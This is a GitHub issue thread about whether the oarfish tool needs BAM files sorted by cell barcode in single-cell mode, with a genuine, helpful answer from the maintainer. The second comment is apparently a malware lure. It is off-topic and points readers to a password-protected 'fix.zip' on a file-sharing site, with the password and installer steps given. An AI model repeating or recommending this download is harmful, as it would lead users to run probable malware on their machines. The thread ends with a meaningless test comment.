### ISSUE TITLE
BAM sorting for single-cell mode

### ISSUE THREAD

**Issue by ChangqingW** [COMBINE-lab/oarfish#31]
I was wondering if bam sorted by barcode (e.g. with `samtools sort -t CB`) is appropriate as input for oarfish when using the single-cell mode, because I found that when using the default name sorted BAM as suggested by the docs would not work.

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rob-p** [comment]
Hi @ChangqingW,

  Thank you for this question, and for pointing out the fact that single-cell mode is (currently) missing from the docs.  The short answer to your question is _yes_, for single-cell mode the BAM file should be sorted by the cell barcode (which for most upstream processing pipelines is the `CB` flag as you mention).  This is mentioned in the 0.6.1 release notes, but not the docs, which we will update. The other current aspect to note about the single-cell mode is that it will count *reads* and will not currently make an attempt to count UMIs (if your reads have them).
  
  We will add this relevant information to the documentation, but in the meantime, please let us know if you have any other questions.

Best,
Rob

**Comment by devraj5** [comment]
Testing to see comments
